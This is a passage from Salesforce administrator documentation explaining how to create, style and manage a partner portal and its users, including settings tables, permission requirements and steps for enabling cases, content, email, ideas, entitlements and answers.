it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

After you have enabled the Salesforce partner portal, you can create partner portals to satisfy the various business needs of
your customers.

To create a partner portal:

1. From Setup, click Customize > Partners > Settings.
2. Click New.
3. Set the following options:

DescriptionSetting

Name of the partner portal as displayed on the portal's detail
and edit pages, as well as the partner portal setup page. The

Name

name of the partner portal is not displayed on portal pages,
but it does display in the browser title bar.

The name of your portal must be unique for your
organization and not already in use by a Customer Portal or
partner portal. Furthermore, an error may occur if you name
a Customer Portal “partner portal” Customer Portal

A description of the partner portal as displayed on the
portal's detail and edit pages. The description of the partner
portal is not displayed in the portal.

Description
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DescriptionSetting

Allows users to log in to the partner portal.

We recommend that you do not select this checkbox until
you have completed configuring your portal.

Login Enabled

Note:  When you enable the partner portal, the
default portal will be set as Login Enabled.

Users must be able to log in to the partner portal, be within
their user profile’s restricted IP range, and be within
designated Login Hours in order to be able to reset their
passwords.

Click the lookup icon ( ) to choose a default administrator
for your partner portal. All email notifications regarding
your partner portal will be sent to this Salesforce user.

When choosing an administrator for your partner portal,
you can only select users that have the “Manage External

Administrator

Users” and “Customize Application” user permissions, and
have access to the Documents folder that contains your
partner portal Header. You cannot deactivate a user selected
as a portal administrator.

Portal Default Settings

DescriptionSetting

The URL of the Web page that displays when users log out
of the partner portal, for example, “http://www.acme.com.”

Logout URL

If a logout URL is not specified, portal users return to the
login page when they log out.

Allows users to view confirmation messages after they
complete an action in the partner portal. For example, after

Show Action Confirmation

a user creates a lead in your partner portal, he or she views
the message: “Lead has been created” if this setting has been
enabled.

Confirmation messages may help users clearly understand
actions they have completed in your partner portal.

Specifies the language that portal HTML messages are
displayed in when custom language portal HTML messages

HTML Messages Default Language

are not configured. This setting is only available for
organizations that have multiple languages enabled.
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Email Notification Settings

DescriptionSetting

The email address from which all partner portal
communication templates are sent, for example,

From Email Address

“support@acme.com.” Salesforce sends the emails
automatically, but they appear to portal users as if they were
sent from this email address. If a portal user responds to a
communication template, the response is sent to this address.

The name associated with the “From” Email Address, for
example, “Acme Partner Support.”

From Email Name

The email template used to send a username and initial
password to all newly-enabled partner portal users. By

New User Template

default, a sample template is automatically selected for you.
This template must be marked as Available for Use.

The email template used to send a new password to existing
partner portal users when you reset their passwords.

New Password Template

The email template used to send a new password to existing
partner portal users when they reset their own passwords by

Lost Password Template

clicking Forgot your password? on the login page of the
partner portal.

The email template used to send a notification to partner
portal users when they become the new owner of a record
in the portal.

Change Owner to Portal User Template

Look and Feel

DescriptionSetting

A text or HTML file that allows you to incorporate your
organization’s branding into the header of your partner

Header

portal. Click the lookup icon ( ) to choose a file that has
been uploaded to a publicly accessible folder on the
Documents tab.

The files you include in the Header and Footer lookup
fields can have a combined size of up to 10 KB.

We recommend that you do not add a header and a logo to
your portal because they may not display properly together.

You can position the logout link anywhere on the header by
using the HTML tag: “<a
href="/secur/logout.jsp">Logout</a>.”

A text or HTML file that allows you to incorporate your
organization’s branding into the footer of your partner portal.

Footer
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Look and Feel

DescriptionSetting

Click the lookup icon ( ) to choose a file that has been
uploaded to a publicly accessible folder on the Documents
tab.

The files you include in the Header and Footer lookup
fields can have a combined size of up to 10 KB.

An image file (.jpg, .gif, .png) that allows you to incorporate
your organization's branding into the top left header of your

Logo

partner portal. Click the lookup icon ( ) to choose a file
that has been uploaded to a publicly accessible folder on the
Documents tab and marked as an Externally
Available Image.

The file you include in the Logo lookup field can be up to
20 KB.

We recommend that you do not add a header and a logo to
your portal because they may not display properly together.

A text or HTML file that allows you to incorporate your
organization’s branding into the header of the login page,

Login Message

forgot password page, and change password page of your

partner portal. Click the lookup icon ( ) to choose a file
that has been uploaded to a publicly accessible folder on the
Documents tab.

The file you include in the Login Message lookup field
can be up to 2 KB.

Note:  JavaScript and CSS code are automatically
removed from HTML files used as the portal login
message.

4. Click Save.

Note:  Contact salesforce.com for information about the number of partner portals you can activate for your
organization.

See Also:
Partner Portal Overview
Enabling the Partner Portal
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Setting Fonts and Colors for Your Partner Portal

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To configure the fonts and colors for a partner portal

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

You can customize the fonts and colors of the Salesforce partner portal to reflect your company’s branding. Your portal’s fonts
and colors are specified in a portal “color theme.” Select a predefined color theme and optionally, customize it to better match
your branding. You can click the See examples link to see all of the theme attributes you can customize.

1. From Setup, click Customize > Partners > Settings.
2. Select the name of your partner portal.
3. Click Change Portal Fonts and Colors.
4. Select a color theme from the Color Theme drop-down list. Select Custom from the Color Theme drop-down list to

create your own theme from scratch. A preview of the color theme you select is automatically displayed in the Preview
sections.

5. Optionally, customize the color of any theme you select by either:

• Entering a hexadecimal value into any theme attribute, or
• Clicking the hexadecimal value of any theme attribute and selecting a color from the point-and-click editor

When you customize a theme, it is automatically renamed Custom when saved. You can customize the following options,
which when customized, automatically display in the Preview sections:

Tab Styles

DescriptionTheme Attribute

Text color of the tab users have selected.Current Tab Text

Background color of the tab users have selected.Current Tab Background

Border color of the tab users have selected.Current Tab Border

Text color of the tabs users have not selected.Other Tab Text

Background color of the tabs users have not selected.Other Tab Background

Border color of the tabs users have not selected.Other Tab Border

Background color behind all tabs.Tab Bar Background

1454

Setting Up Your Partner PortalAdministering People and Organizations That Users Sell To



Page Styles

DescriptionTheme Attribute

Portal background color, excluding search, related lists,
recent items, solution categories, document folders, and the
Create New drop-down list.

Page Background

Text color, size, and font on all portal items, except for tabs,
buttons, headers, and field labels.

Optionally, you can change the percent displayed in the
percent field to increase or decrease the size of all portal

Text

items. Additionally, you can change the font of all portal
items, except for tabs, buttons, headers, and field labels from
the drop-down list.

Text color of the field names on records.

Optionally, you can change the font of the text from the
drop-down list.

Field Label Text

Text color of all links.Link

Text color of all links when a user hovers the mouse over
them.

Link Hover

Color of the lines that separate fields on records.Field Separator

Color of the line bordering the bottom of the portal.Bottom Border

Section Styles

DescriptionTheme Attribute

Background color of all headings, including search, recent
items, related lists, solution categories, documents folders,
and the selected tab.

Header Background

Text color and font on the headers of search, related lists,
recent items, solution categories, and document folders.

Optionally, you can change the font of the text from the
drop-down list.

Section Header Text

Border to the left of search, related lists, recent items,
solution categories, document folders, and the Create New
drop-down list.

Optionally, you can change the number of pixels displayed
in the pixel field to increase or decrease the thickness of the

Left Border

border. Additionally, you can select the style of the line
displayed for the border from the drop-down list.
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Section Styles

DescriptionTheme Attribute

Border to the right of search, related lists, recent items,
solution categories, document folders, and the Create New
drop-down list.

Optionally, you can change the number of pixels displayed
in the pixel field to increase or decrease the thickness of the

Right Border

border. Additionally, you can select the style of the line
displayed for the border from the drop-down list.

Border above search, related lists, recent items, solution
categories, document folders, and the Create New
drop-down list.

Optionally, you can change the number of pixels displayed
in the pixel field to increase or decrease the thickness of the

Top Border

border. Additionally, you can select the style of the line
displayed for the border from the drop-down list.

Border underneath search, related lists, recent items, solution
categories, document folders, and the Create New
drop-down list.

Optionally, you can change the number of pixels displayed
in the pixel field to increase or decrease the thickness of the

Bottom Border

border. Additionally, you can select the style of the line
displayed for the border from the drop-down list.

Background color of search, related lists, recent items,
solution categories, document folders, and the Create New
drop-down list.

Section Background

List Styles

DescriptionTheme Attribute

Text color of the field names selected as column headings
on list views.

Optionally, you can change the font of the text from the
drop-down list.

List Header Text

Color of the lines underneath column headings on related
lists and list views.

Header Underline

Color of the lines between records on list views.Separator

Color of a record when a user hovers the mouse over it on
list views.

Row Highlight
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6. Click Save to save all changes to the theme values.

Tip: Changes are visible to partner portal users when they refresh their browsers. Therefore, we recommend
updating your portal color theme at times when users are least likely to visit your partner portal.

See Also:
Partner Portal Overview
Enabling the Partner Portal

Customizing Your Partner Portal Tabs

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize partner portal tabs:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

In addition to custom objects, the following tabs can be displayed in the partner portal:

• Accounts

• Answers

• Articles (requires Salesforce Knowledge

• Cases

• Contacts

• Documents

• Ideas

• Leads

• Opportunities

• Entitlements

• Service contracts

• Solutions

• Salesforce CRM Content tabs

• Reports
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You can choose which tabs display to users logged in to a Salesforce partner portal, and customize the order in which tabs
display to portal users:

1. From Setup, click Customize > Partners > Settings.
2. Select the name of your partner portal.
3. Click Customize Portal Tabs.
4. To add or remove tabs, select a tab title, and click the Add or Remove arrow to add or remove the tab to or from the

Selected Tabs box. To change the order of the tabs, select a tab title in the Selected Tabs box, and click the Up or Down
arrow.

5. Optionally, from the Default Landing Tab drop-down, you can select which tab to display to users when they log
into your portal.

6. Click Save.

You can further specify which tabs users can access by editing tab settings in users’ associated profiles and permission sets.

The page layouts of tabs on the partner portal are controlled by the page layouts configured in the profiles assigned to the
portal.

To edit the tab layouts for a profile:

1. From Setup, click Customize > Partners > Settings.
2. Select the name of your partner portal.
3. Select the name of the profile you want to edit from the Assigned Profiles related list.
4. Click View Assignment under page layouts next to the standard or custom object you want to edit.
5. Click Edit Assignment.
6. Select a new page layout next to the profile name you are editing.
7. Click Save.

Enabling Calendar and Events on the Home Tab

You can allow partner users to view a calendar and list of scheduled events on the Home tab of the partner portal. The calendar
and events in the partner portal work the same as the calendar and events on the Home tab of Salesforce, with the following
exceptions: spell check, event updates, enhanced list views, drag-and-drop scheduling, calendar sharing, and hover details are
not supported in the partner portal.

Note:  A partner user can only see calendars shared by:

• Other partner users assigned to the same account
• The channel manager for their account

Portal users can view tasks and events from their calendar. Additionally, portal users with the “Edit Events” permission can
create, edit, and delete events.

Enabling the Welcome Component on the Home Tab

Include the Partner Portal Welcome component on home page layouts assigned to partner portal users. When users log in to
your portal they receive a welcome message with their name, their channel manager's name, and links to both their company
and personal profiles. They can click the linked channel manager name to send an email to that person. When portal users
change information about themselves their user record is automatically updated but their contact record is not.

Note:  The Partner Portal Welcome component is also available for the Customer Portal home page, however, it
only provides a welcome message with the user's name.
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Allowing Portal Users to View the Reports Tab

To allow portal users to view the Reports tab:

1. Grant portal users access to the folders on your Salesforce Reports tab that contain the reports you want them to run.
2. Set the organization-wide default sharing model to Private on objects you want portal users to report on.
3. Grant the “Run Reports” permission to portal users.

When you add the Reports tab to your partner portal, portal users:

• Can run reports but cannot customize reports or filter report results.
• Can export reports to Excel if they have the “Export Reports” permission.
• Do not have access to the Unfiled Public Reports and My Personal Custom Reports folders.
• Receive an insufficient privileges error if they run a report that contains objects they do not have permission to view.

Note:  The Reports tab is only available to partner users with Gold Partner licenses.

See Also:
Partner Portal Overview
Enabling the Partner Portal

Configuring Multilingual HTML Messages for Partner Portals

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To configure languages in portals:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

If your organization has multiple languages enabled, you can upload HTML messages in any of the languages supported by
Salesforce and configure the messages to display in the portal based on portal user language settings. For example, you can
upload an HTML message in French to display on the Home tab for portal users with French language settings, and an
HTML message in English to display on the Home tab for portal users with English language settings.

Note the following before configuring multilingual HTML messages:

• Before you can add a multilingual HTML message to a portal, you must upload the HTML-formatted file in the Documents
tab.
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• Even if configured, portal HTML messages will not display on the Ideas, Reports, Content, or Solutions tabs.

To configure multilingual HTML messages:

1. To configure a display language for the partner portal, click Customize > Partners > Settings.
2. Click the name of the portal to edit.
3. Click Add New Language in the Assigned Languages related list.
4. Select a language from the Language drop-down list.

5. Click the lookup icon ( ) next to a tab name, then select the HTML message to display on that tab. Optionally repeat
this step for each tab that you want to display an HTML message.

6. Click Save.

See Also:
Partner Portal Overview
Enabling the Partner Portal

Partner Portal Settings

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To modify partner portal settings:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

To edit the settings and communication templates for a partner portal:

1. From Setup, click Customize > Partners > Settings.
2. Click the name of the portal you want to edit.
3. Click Edit.
4. Set the following options:

DescriptionSetting

Name of the partner portal as displayed on the portal's detail
and edit pages, as well as the partner portal setup page. The

Name

name of the partner portal is not displayed on portal pages,
but it does display in the browser title bar.
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DescriptionSetting

The name of your portal must be unique for your
organization and not already in use by a Customer Portal or
partner portal. Furthermore, an error may occur if you name
a Customer Portal “partner portal” Customer Portal

A description of the partner portal as displayed on the
portal's detail and edit pages. The description of the partner
portal is not displayed in the portal.

Description

Allows users to log in to the partner portal.

We recommend that you do not select this checkbox until
you have completed configuring your portal.

Login Enabled

Note:  When you enable the partner portal, the
default portal will be set as Login Enabled.

Users must be able to log in to the partner portal, be within
their user profile’s restricted IP range, and be within
designated Login Hours in order to be able to reset their
passwords.

Click the lookup icon ( ) to choose a default administrator
for your partner portal. All email notifications regarding
your partner portal will be sent to this Salesforce user.

When choosing an administrator for your partner portal,
you can only select users that have the “Manage External

Administrator

Users” and “Customize Application” user permissions, and
have access to the Documents folder that contains your
partner portal Header. You cannot deactivate a user selected
as a portal administrator.

Portal Default Settings

DescriptionSetting

The URL of the Web page that displays when users log out
of the partner portal, for example, “http://www.acme.com.”

Logout URL

If a logout URL is not specified, portal users return to the
login page when they log out.

Allows users to view confirmation messages after they
complete an action in the partner portal. For example, after

Show Action Confirmation

a user creates a lead in your partner portal, he or she views
the message: “Lead has been created” if this setting has been
enabled.
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Portal Default Settings

DescriptionSetting

Confirmation messages may help users clearly understand
actions they have completed in your partner portal.

Specifies the language that portal HTML messages are
displayed in when custom language portal HTML messages

HTML Messages Default Language

are not configured. This setting is only available for
organizations that have multiple languages enabled.

Email Notification Settings

DescriptionSetting

The email address from which all partner portal
communication templates are sent, for example,

From Email Address

“support@acme.com.” Salesforce sends the emails
automatically, but they appear to portal users as if they were
sent from this email address. If a portal user responds to a
communication template, the response is sent to this address.

The name associated with the “From” Email Address, for
example, “Acme Partner Support.”

From Email Name

The email template used to send a username and initial
password to all newly-enabled partner portal users. By

New User Template

default, a sample template is automatically selected for you.
This template must be marked as Available for Use.

The email template used to send a new password to existing
partner portal users when you reset their passwords.

New Password Template

The email template used to send a new password to existing
partner portal users when they reset their own passwords by

Lost Password Template

clicking Forgot your password? on the login page of the
partner portal.

The email template used to send a notification to partner
portal users when they become the new owner of a record
in the portal.

Change Owner to Portal User Template

Look and Feel

DescriptionSetting

A text or HTML file that allows you to incorporate your
organization’s branding into the header of your partner

Header

portal. Click the lookup icon ( ) to choose a file that has
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Look and Feel

DescriptionSetting

been uploaded to a publicly accessible folder on the
Documents tab.

The files you include in the Header and Footer lookup
fields can have a combined size of up to 10 KB.

We recommend that you do not add a header and a logo to
your portal because they may not display properly together.

You can position the logout link anywhere on the header by
using the HTML tag: “<a
href="/secur/logout.jsp">Logout</a>.”

A text or HTML file that allows you to incorporate your
organization’s branding into the footer of your partner portal.

Footer

Click the lookup icon ( ) to choose a file that has been
uploaded to a publicly accessible folder on the Documents
tab.

The files you include in the Header and Footer lookup
fields can have a combined size of up to 10 KB.

An image file (.jpg, .gif, .png) that allows you to incorporate
your organization's branding into the top left header of your

Logo

partner portal. Click the lookup icon ( ) to choose a file
that has been uploaded to a publicly accessible folder on the
Documents tab and marked as an Externally
Available Image.

The file you include in the Logo lookup field can be up to
20 KB.

We recommend that you do not add a header and a logo to
your portal because they may not display properly together.

A text or HTML file that allows you to incorporate your
organization’s branding into the header of the login page,

Login Message

forgot password page, and change password page of your

partner portal. Click the lookup icon ( ) to choose a file
that has been uploaded to a publicly accessible folder on the
Documents tab.

The file you include in the Login Message lookup field
can be up to 2 KB.

Note:  JavaScript and CSS code are automatically
removed from HTML files used as the portal login
message.
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5. Click Save.

See Also:
Partner Portal Overview
Enabling the Partner Portal
Partner Portal Settings

Creating Partner Users

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create, edit, disable, or deactivate users:

“Create” on contactsTo create contacts:

“Read” on contactsTo view contacts:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Once you have a partner account created, you can add partner users to the account as contact records. Partner users are Salesforce
users with limited capabilities focused on managing leads. Partner users log in to Salesforce through the portal.

Before creating partners, you should configure your portals; otherwise, your partner users may attempt to log into your portal
before your portals are ready.

To create a partner user:

1. View the partner account for which you want to create a partner user.
2. Create a new contact for the partner user. Choose New from the Contacts related list. Fill in the appropriate details, and

click Save.
3. On the contact detail page, click Manage External User and choose Enable Partner User.
4. Edit the user record for this partner.
5. Click Save.

Once a partner user has been created, the partner account and the partner user can be edited independently. Changes made
to one are not reflected in the other.

To troubleshoot issues or ensure the portal is configured appropriately, on the contact detail page, click Manage External
User and choose Log in to Portal as User. A new browser window opens and you are logged into the portal as the portal user.
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Tips on Creating Partner Users

Consider the following when creating partner users:

• If you have enabled a user as a delegated administrator, the user cannot create a external user unless at least one partner
profile has been added to the Assignable Profiles related list and the user has the “Manage Users” permission.

• The available profiles for the partner user are limited to the Partner User profile or profiles that have been cloned from it.
Unlike a standard user, the partner user role is automatically assigned based on the account name. The partner user role is
a subordinate of the account owner's role, therefore, all data for the partner user role rolls up to the partner account owner's
role. Keep in mind that if you disable a portal user, their partner user role becomes obsolete and their data no longer rolls
up to the partner account role.

• Partner users and contacts cannot be deleted. If you no longer want a partner user to have access to the portal, deactivate
the partner user.

• Partner contacts cannot be owned by a non-partner account.

See Also:
Partner Portal Overview
Enabling the Partner Portal
Partner Portal Overview
Enabling the Partner Portal

ENABLING FEATURES IN THE PARTNER PORTAL

Enabling Cases in the Partner Portal
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To enable cases for partner users:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

When you enable cases in the partner portal, you can assign cases to partner users directly or using assignment or escalation
rules. Partner users can edit cases, create new cases, add case comments, reassign cases, find case solutions, and create case
teams. Partner users cannot edit case comments, associate assets with cases, or delete cases.
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Note:  Case comments added by partner portal users are public and can be viewed by any user that can view the case.

To enable cases in the partner portal:

1. Add the Cases tab to the list of available tabs in the partner portal.
2. In the partner user profile, verify that the cases tab setting is set to Default On.
3. In the partner user profile, enable the “Read,” “Create,” and “Edit” object permissions for cases.

After enabling cases in the partner portal, consider the following tips:

• Specify a case creation template to allow partner users to send a notification email to new contacts assigned to cases. From
Setup, click Customize > Cases > Support Settings.

• Configure case team roles to allow your partners to add case team members. From Setup, click Customize > Cases > Case
Teams > Case Team Roles.

• When viewing an email associated with a case, Email Message List, Next, and Previous links are not available to portal
users.

See Also:
Partner Portal Overview
Enabling the Partner Portal
Partner Portal Settings
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Enabling Salesforce CRM Content in the Partner Portal
Available in: Enterprise, Unlimited, and Developer Editions

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

User Permissions Needed

“Customize Application”To set up and update the partner portal:

“Manage Users”To create and edit profiles:

“Manage External Users”To manage partner portal users:

“Manage Salesforce CRM Content”

OR

“Manage Content Permissions”

To create Salesforce CRM Content library permissions:

“Manage Salesforce CRM Content”

OR

Manage Library checked in your library permission
definition

To add users to a Salesforce CRM Content library:

Salesforce CRM Content is available in the partner portal. Two levels of access to Salesforce CRM Content can be granted
to partner portal users:

• Portal users without a Salesforce CRM Content feature license can download, rate, comment on, and subscribe to content
if they have the “View Content on Portals” user permission. They cannot view potentially sensitive data such as usernames
and download, version, and subscriber history. The content delivery feature is not available to portal users.

• Portal users with a Salesforce CRM Content feature license can access all Salesforce CRM Content features granted by
their library permission(s), including contributing content, moving and sharing content among libraries, and deleting
content. They can also view Salesforce CRM Content reports. The content delivery feature is not available to portal users.

Enable Salesforce CRM Content for Non-Licensed Users

After you have enabled the partner portal, complete the following steps to enable Salesforce CRM Content in your portals.
Use these steps if you have not purchased Salesforce CRM Content feature licenses for your portal users.

1. Update your cloned Partner User profiles:

a. Include the “View Content on Portals” user permission.
b. Change the tab visibility for the Libraries, Content, and Subscriptions tabs from Tab Hidden to Default On.
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c. Assign the updated profile to partner portal users as needed.

2. Determine what privileges your portal users will have in each Salesforce CRM Content library by creating one or more
library permissions.

Note:  A library permission can only grant privileges that a user's feature license or profile permits. For example,
even though Tag Content is a library permission option, selecting it does not allow portal users without a
Salesforce CRM Content feature license to tag content.

3. Determine which libraries you want your portal users to have access to. Ensure that confidential content is not available
in these libraries.

4. Add portal users to libraries. Portal users with the Partner User profile or a clone of that profile can only be added to a
library as part of a public group.

5. Add the Salesforce CRM Content tabs to each partner portal.

Note:  The Documents tab is not part of Salesforce CRM Content.

Enable Salesforce CRM Content for Licensed Users

After you have enabled the partner portal, complete the following steps to enable Salesforce CRM Content in your portals.
Use these steps if you have purchased Salesforce CRM Content feature licenses for your portal users.

1. Update your cloned Partner User profiles:

a. Optionally, add the “Create Libraries” user permission if you want to allow portal users to create and administer new
libraries.

b. Change the tab visibility for the Libraries, Content, and Subscriptions tabs from Tab Hidden to Default On.
c. Assign the updated profile to partner portal users as needed.

2. Select the Salesforce CRM Content User checkbox on the user detail page for each partner portal user.
3. Determine what privileges your portal users will have in each Salesforce CRM Content library by creating one or more

library permissions.

Note:  A library permission can only grant privileges that a user's feature license or profile permits. For example,
even though Tag Content is a library permission option, selecting it does not allow portal users without a
Salesforce CRM Content feature license to tag content.

4. Determine which libraries you want your portal users to have access to. Ensure that confidential content is not available
in these libraries.

5. Add portal users to libraries. Portal users with the Partner User profile or a clone of that profile can only be added to a
library as part of a public group.

6. Add the Salesforce CRM Content tabs to each partner portal.

Note:  The Documents tab is not part of Salesforce CRM Content.

See Also:
Partner Portal Overview
Enabling the Partner Portal
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Enabling Email in the Partner Portal
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To enable email in the partner portal:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Enabling email in the partner portal allows partner users to send email from Activity History related lists in the partner portal.
For example, a partner user can click the Send An Email button in the Activity History related list on a lead to send an
email to the lead and log the email in the related list.

To allow partner users to send email from the partner portal, grant them the “Send Email” permission. For partner users to
use email templates, you must make the templates available to them.

See Also:
Partner Portal Overview
Enabling the Partner Portal

Enabling Ideas in the Partner Portal
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up and update the partner portal:

“Customize Application”To create a community:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.
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After you set up your partner portal, follow the steps below to enable ideas in your portal:

1. From Setup, click Customize > Ideas > Zones to create a community for ideas that is active and configured to display in
the portal.

2. Add the Ideas tab to your partner portal.
3. If your organization has the Ideas and Answers Portal license, hide the Reports tab in the partner portal. Otherwise, your

partner portal users receive an Insufficient Privileges message when they click the Reports tab.

See Also:
Partner Portal Overview
Enabling the Partner Portal

Enabling Entitlement Management in the Partner Portal
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

"Customize Application"To set up and update the partner portal:

"Manage Users"To create and edit profiles or manage portal users:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

You can use the partner portal to provide your partners with access to entitlements, service contracts, or contract line items.

After you have set up entitlement management and enabled a partner portal, complete the following steps to add entitlement
management to your portals.

1. Update your cloned Partner User profiles:

a. Include the “Read” permission on entitlements, service contracts, or contract line items.
b. Optionally, on the profiles of delegated partner user administrators, include the “Create” and “Delete” permissions on

entitlement contacts. This lets delegated external user administrators update entitlement contacts.
c. Verify that the tab visibility for the Entitlements or Service Contracts tabs are Default On. Contract line items display

on service contracts.

2. At the bottom of the partner portal detail page, click Edit Profiles and activate the new profile.
3. Customize case page layouts to add the Entitlement Name lookup field. This lets partner users add entitlements to

cases.
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Tip: Don't add the following entitlement process fields to case page layouts for portal users because portal users
shouldn't access information related to your internal support processes: Entitlement Process Start Time,
Entitlement Process End Time, Stopped, and Stopped Since.

4. Optionally, customize related lists on accounts and contacts to add Entitlements. This lets delegated external user
administrators create cases automatically associated with the right entitlements.

5. Add the Entitlements or Service Contracts tabs to each partner portal.
6. Assign the cloned profiles to your partner portal users:

a. To create a new partner portal user, click Manage External User and choose Enable Partner User on the contact detail
page. To update an existing user, click Manage External User and choose View Partner User.

b. For a new user, select the cloned profile from the Profile drop-down menu. For an existing user, click Edit  and then
select the profile.

c. Click Save.

See Also:
Partner Portal Overview
Enabling the Partner Portal

Enabling Answers in the Partner Portal
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up and update the partner portal:

“Manage Users”To create and edit profiles:

“Customize Application”To create an answers community:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

You can use the partner portal to provide your partners with access to an answers community.

To enable answers in your portal.

1. Set up your partner portal.

When customizing your portal fonts and colors, note that answers only supports the following changes:
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All tab styles•
• The following page styles:

◊ Page Background
◊ Text
◊ Link
◊ Link Hover

2. Set up answers, making sure that your answers community is configured to display in the partner portal.
3. Add the Answers tab to your partner portal.
4. Create partner portal users.
5. If you want your partner portal users to have different category group visibility settings than the account owner, change

the visibility settings for the partner portal user.

By default, partner portal users inherit which categories they can access from the account owner. For example, if the account
owner has a role of CEO and the CEO role has full access to all the data categories in the category group assigned to
answers, then partner portal users can also access all categories in the answers community. In some cases, you may want
to limit which categories a partner portal user can access.

6. If your organization has the Ideas and Answers Portal license, hide the Reports tab in the partner portal. Otherwise, your
partner portal users receive an Insufficient Privileges message when they click the Reports tab.

See Also:
Partner Portal Overview
Enabling the Partner Portal
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Managing Partner Users
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage External Users”To manage partner portal users:

“Manage Users”To create, edit, and delete profiles:

“Customize Application”To create, edit, and delete page layouts:

“Customize Application”To set field-level security:

“Manage Users”To set sharing rules:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Because your Salesforce partner portal has functionality that is similar to Salesforce, you manage your partner portal users in
much the same way as you manage your Salesforce users.

Consider how the following items affect how you manage partner portal users:

Partner Portal Profiles

The permissions you assign to partner portal users define what functions they can perform within your organization's
partner portal, such as whether users can view, create, or edit cases and custom object records. When you enable a partner
portal, the Partner User profile is automatically created for your organization. The Partner User profile cannot be modified.

To enable partner users to log in to a partner portal, create profiles for your partners cloned from the Partner User profile.
For each cloned profile, verify that the “API Only User” permission is not selected; if this permission is selected, users
associated with the profile will not be able to log in to the partner portal. Cloning these profiles or creating permission
sets also allows you to specify what portal users can do.

Partner Portal Sharing Rules

After you enable your partner portal, the following groups and sharing rule category are created:

DescriptionGroup or Category

Contains all partner portal users in your organizationAll Partner Portal Users group

Contains all Salesforce users in your organizationAll Internal Users group

Allows you to create sharing rules in which you can choose
specific Salesforce users in your organization by role plus

Roles and Internal Subordinates sharing rule category
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DescriptionGroup or Category

all of the users in roles below that role, excluding any
partner portal roles

You can use these groups and the sharing rule category to easily create sharing rules that grant all of your partner portal
or Salesforce users access to specific data. You can also create sharing rules between partner portal users and Salesforce
users, but not between partner users associated with different partner accounts.

If Salesforce Knowledge is enabled in your partner portal, portal users can see articles as permitted by the category group
visibility settings.

Partner Portal Role Hierarchy

A portal user role hierarchy is created for an account and its contacts when you enable the first partner portal user on
that account. The account is added to the role hierarchy beneath the user that owns the account. Whenever you enable
a contact as a partner portal user, he or she is automatically assigned to the User role in the account's portal role hierarchy.
The default number of roles in portal accounts is three. You can reduce the number of roles or add roles to a maximum
of three. Partner users can be assigned one of three roles:
• Executive

• Manager

• User

The Partner Executive role is immediately under the channel manager's role in the role hierarchy. The Partner Manager
